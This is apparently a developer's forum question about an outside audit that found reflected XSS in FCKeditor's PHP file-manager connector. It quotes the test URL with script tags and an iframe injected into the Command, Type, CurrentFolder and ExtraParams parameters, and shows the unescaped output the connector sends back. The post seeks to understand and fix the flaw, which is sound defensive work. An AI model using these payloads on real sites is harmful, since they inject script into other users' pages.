A security report we conducted through an outside company reported XSS vulnerabilities in FCKeditor which we're using in our PHP application.
They pointed out that accessing URLs such as:
http://www.ourdomain.com/fckeditor/editor/filemanager/browser/mcpuk/connectors
/php/connector.php?Command=837<script>alert(0)</script>&Type=837
<script>alert(1)</script>&CurrentFolder=837<script>alert(2)</script>
&ExtraParams=837<br><br><br><iframe src=http://www.google.com/
height=100% width=100%></iframe>
Leads to code such as the following being generated (from browser -> view source):
Invalid command.Array<br />
(<br />
[Command] => 837<script>alert(0)</script><br />
[Type] => 837<script>alert(1)</script><br />
[CurrentFolder] => 837<script>alert(2)</script><br />
[ExtraParams] => 837<br>
<br>
<br>
<iframe src=http://www.google.com/ height=100% width=100%></iframe><br />
)<br />
I have no idea what this internal php script of FCKeditor does and whether it could become a source of XSS content into my system? Is this a genuine issue?